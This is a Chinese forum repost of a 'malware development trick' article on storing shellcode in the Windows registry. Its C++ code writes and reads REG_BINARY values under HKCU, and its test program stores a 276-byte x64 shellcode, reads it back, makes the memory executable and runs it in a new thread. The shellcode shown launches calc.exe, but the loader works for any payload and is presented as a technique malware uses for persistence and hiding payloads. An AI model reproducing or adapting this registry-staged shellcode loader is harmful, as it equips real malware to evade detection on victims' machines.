那曲檬骨新材料有限公司

搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評論與回復(fù)
      VIP于 到期 續(xù)費(fèi)
      登錄后你可以
      • 下載海量資料
      • 學(xué)習(xí)在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會(huì)員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動(dòng)

      完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示

      在windows注冊表中存儲(chǔ)二進(jìn)制數(shù)據(jù)

      蛇矛實(shí)驗(yàn)室 ? 來源:蛇矛實(shí)驗(yàn)室 ? 2023-05-31 14:13 ? 次閱讀

      簡介

      注冊表是 Windows 操作系統(tǒng)中一個(gè)重要的數(shù)據(jù)庫,它包含 Windows 操作系統(tǒng)和應(yīng)用程序的重要設(shè)置和選項(xiàng)。由于注冊表的功能非常強(qiáng)大,因此注冊表對于惡意程序來說是非常有利用價(jià)值的。

      在 windows 注冊表中存儲(chǔ)二進(jìn)制數(shù)據(jù),這是一種常見的技術(shù),常被惡意軟件用于持久化或存儲(chǔ)惡意的 payload

      在注冊表中存儲(chǔ)二進(jìn)制數(shù)據(jù)

      boolStoreBinaryDataInRegistry(conststd::wstring& subKeyPath, conststd::wstring& vauleName, constvoid* binaryData, DWORD dataSize)
{
HKEY hkey;
LSTATUS res = RegCreateKeyExW(HKEY_CURRENT_USER, subKeyPath.c_str(), 0, NULL, 0, KEY_WRITE, NULL, &hkey, NULL);
if(res == ERROR_SUCCESS)
{
res = RegSetValueExW(hkey, vauleName.c_str(), 0, REG_BINARY, reinterpret_cast(binaryData), dataSize);

RegCloseKey(hkey);
}

return(res == ERROR_SUCCESS);
}

      上述代碼將二進(jìn)制數(shù)據(jù)存儲(chǔ)到 Windows 注冊表中。

      取出存儲(chǔ)的二進(jìn)制數(shù)據(jù)

      boolGetBinaryDataFromRegistry(conststd::wstring& subKeyPath, conststd::wstring& valueName, std::vector& outBuffer)
{
HKEY hKey;

LSTATUS res = RegOpenKeyExW(HKEY_CURRENT_USER, subKeyPath.c_str(), 0, KEY_READ, &hKey);
if(res != ERROR_SUCCESS) {
returnfalse;
}

DWORD dataType;
DWORD dataSize = 0;
res = RegQueryValueEx(hKey, valueName.c_str(), nullptr, &dataType, nullptr, &dataSize);
if(res != ERROR_SUCCESS || dataType != REG_BINARY) {
RegCloseKey(hKey);
returnfalse;
}

outBuffer.resize(dataSize);
res = RegQueryValueEx(hKey, valueName.c_str(), nullptr, &dataType, &outBuffer[0], &dataSize);
RegCloseKey(hKey);

return(res == ERROR_SUCCESS);
}

      上述代碼將從注冊表指定位置取出二進(jìn)制數(shù)據(jù)保存在 vector 中。

      測試

      intmain()
{
unsigned char calc_thread64_bin[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
unsigned intcalc_thread64_bin_len = 276;

StoreBinaryDataInRegistry(L"SOFTWARE\testApp", L"test", calc_thread64_bin, calc_thread64_bin_len);

std::vector payload;
GetBinaryDataFromRegistry(L"SOFTWARE\testApp", L"test", payload);

auto execMem = VirtualAlloc(NULL, calc_thread64_bin_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

memmove(execMem, payload.data(), calc_thread64_bin_len);

DWORD oldProtect;
auto ret = VirtualProtect(execMem, calc_thread64_bin_len, PAGE_EXECUTE_READ, &oldProtect);

if(ret != 0) {
HANDLE th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)execMem, 0, 0, 0);
WaitForSingleObject(th, -1);
}

return0;
}

      上述測試代碼首先使用 StoreBinaryDataInRegistry 將 payload 寫入注冊表指定位置(HKCUSOFTWARE estApp)下的 test 字段,之后從使用GetBinaryDataFromRegistry 取出 payload 數(shù)據(jù)并創(chuàng)建線程執(zhí)行 payload。

      效果:寫入注冊表中指定位置的數(shù)據(jù)。

      99d6833c-fc66-11ed-90ce-dac502259ad0.png

      當(dāng)程序成功執(zhí)行將彈出計(jì)算器窗口。

      99e73c04-fc66-11ed-90ce-dac502259ad0.png

      審核編輯:彭靜
      聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
      • 數(shù)據(jù)
        +關(guān)注

        關(guān)注

        8

        文章

        7139

        瀏覽量

        89579
      • 存儲(chǔ)
        +關(guān)注

        關(guān)注

        13

        文章

        4355

        瀏覽量

        86175
      • WINDOWS
        +關(guān)注

        關(guān)注

        4

        文章

        3570

        瀏覽量

        89307

      原文標(biāo)題:maldev tricks在注冊表中存儲(chǔ) payload

      文章出處:【微信號:蛇矛實(shí)驗(yàn)室,微信公眾號:蛇矛實(shí)驗(yàn)室】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

      收藏 人收藏

        評論

        相關(guān)推薦

        偏移二進(jìn)制二進(jìn)制補(bǔ)碼如何和實(shí)際數(shù)據(jù)對應(yīng),如何轉(zhuǎn)換?

        偏移二進(jìn)制二進(jìn)制補(bǔ)碼如何和實(shí)際數(shù)據(jù)對應(yīng),如何轉(zhuǎn)換,請哪位高手解惑
        發(fā)表于 01-16 06:01

        hex格式和二進(jìn)制的區(qū)別

        HEX格式和二進(jìn)制多個(gè)方面存在顯著的區(qū)別。以下是對這兩者的對比: 一、定義與表示方式 HEX格式 : HEX,全稱為Intel HEX,是一種用于存儲(chǔ)和傳輸數(shù)據(jù)到嵌入式系統(tǒng)(如單片機(jī)
        的頭像 發(fā)表于 11-18 15:24 ?733次閱讀

        二進(jìn)制編碼器應(yīng)用場景 二進(jìn)制編碼器與模擬編碼器比較

        編碼器是將信息從一種形式或格式轉(zhuǎn)換為另一種形式的設(shè)備。在數(shù)字和模擬系統(tǒng),編碼器扮演著至關(guān)重要的角色。二進(jìn)制編碼器和模擬編碼器是兩種常見的編碼器類型,它們不同的應(yīng)用場景中有著各自的優(yōu)勢和局
        的頭像 發(fā)表于 11-06 09:45 ?589次閱讀

        二進(jìn)制編碼器工作原理 如何選擇二進(jìn)制編碼器

        二進(jìn)制編碼器是一種數(shù)字電路,它將輸入的二進(jìn)制代碼轉(zhuǎn)換為對應(yīng)的輸出信號。在數(shù)字系統(tǒng),編碼器用于將數(shù)據(jù)從一種形式轉(zhuǎn)換為另一種形式,以便于處理和傳輸。
        的頭像 發(fā)表于 11-06 09:44 ?1154次閱讀

        二進(jìn)制處理的一些技巧

        二進(jìn)制和十進(jìn)制的處理,有時(shí)候一些小技巧是很有用的。 1、把十進(jìn)制數(shù)轉(zhuǎn)換成二進(jìn)制數(shù)
        的頭像 發(fā)表于 07-05 11:51 ?629次閱讀

        進(jìn)制和4位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《十進(jìn)制和4位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-31 09:32 ?1次下載
        十<b class='flag-5'>進(jìn)制</b>和4位<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        二進(jìn)制串行計(jì)數(shù)器工作原理是什么?

        在數(shù)字電路設(shè)計(jì),計(jì)數(shù)器是一種非常關(guān)鍵的組件,用于測量時(shí)間、計(jì)數(shù)事件或跟蹤狀態(tài)變化等。其中,二進(jìn)制串行計(jì)數(shù)器作為一種常用的計(jì)數(shù)器類型,多種應(yīng)用場景中都發(fā)揮著重要作用。本文將對二進(jìn)制
        的頭像 發(fā)表于 05-28 15:52 ?964次閱讀

        同步4位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《同步4位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-22 09:44 ?0次下載
        同步4位<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        同步4位上/下二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《同步4位上/下二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-17 10:52 ?0次下載
        同步4位上/下<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        異步7位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《異步7位二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-17 09:15 ?0次下載
        異步7位<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        4位二進(jìn)制計(jì)數(shù)器FCT163T數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《4位二進(jìn)制計(jì)數(shù)器FCT163T數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-16 09:40 ?0次下載
        4位<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器FCT163T<b class='flag-5'>數(shù)據(jù)表</b>

        雙4位十進(jìn)制二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《雙4位十進(jìn)制二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-13 11:12 ?0次下載
        雙4位十<b class='flag-5'>進(jìn)制</b>和<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        十進(jìn)位、除以十二和二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《十進(jìn)位、除以十二和二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-13 11:03 ?0次下載
        十進(jìn)位、除以十二和<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        同步4位十進(jìn)制二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表

        電子發(fā)燒友網(wǎng)站提供《同步4位十進(jìn)制二進(jìn)制計(jì)數(shù)器數(shù)據(jù)表.pdf》資料免費(fèi)下載
        發(fā)表于 05-09 11:29 ?3次下載
        同步4位十<b class='flag-5'>進(jìn)制</b>和<b class='flag-5'>二進(jìn)制</b>計(jì)數(shù)器<b class='flag-5'>數(shù)據(jù)表</b>

        如何實(shí)現(xiàn)二進(jìn)制和BCD碼數(shù)據(jù)的相互轉(zhuǎn)變?

        如何實(shí)現(xiàn)二進(jìn)制和BCD碼數(shù)據(jù)的相互轉(zhuǎn)變? 二進(jìn)制碼是將十進(jìn)制數(shù)字表示為二進(jìn)制數(shù)和十進(jìn)制數(shù)的一種表
        的頭像 發(fā)表于 02-18 14:51 ?3866次閱讀
        百家乐官网手机软件| 大发888 软件| 狮威百家乐官网娱乐网| 大发888游戏下载官方下载| 百家乐官网园选| 盈禾娱乐| 百家乐桌保险| 太阳城百家乐官网公司| 貔喜脉动棋牌下载| 乐百家乐彩娱乐城| 网络百家乐官网免费试玩| 大发888娱乐城 34hytrgwsdfpv| 网络百家乐必胜投注方法| 休闲百家乐官网的玩法技巧和规则 | 百家乐必赢术| 机械百家乐官网技巧| 六合彩天线宝宝| 赌场百家乐实战| 百家乐官网英皇娱乐| 府谷县| 威尼斯人娱乐城微博| 网上百家乐官网如何作假| tt百家乐的玩法技巧和规则| 百家乐官网发牌盒子| 视频| 大发888 登陆不上| 百家乐视频游戏冲值| 做百家乐官网网上投注| 十六浦娱乐城官网| 圆梦城百家乐娱乐城| 星期8百家乐官网的玩法技巧和规则| 什邡市| 大发888娱乐城.com| 真人百家乐代理合作| 百家乐官网二游戏机| 大发888官方网站登录| 神人百家乐赌场| 免邮百家乐官网布桌| 百家乐官网必学技巧| 宝胜| 联合百家乐的玩法技巧和规则|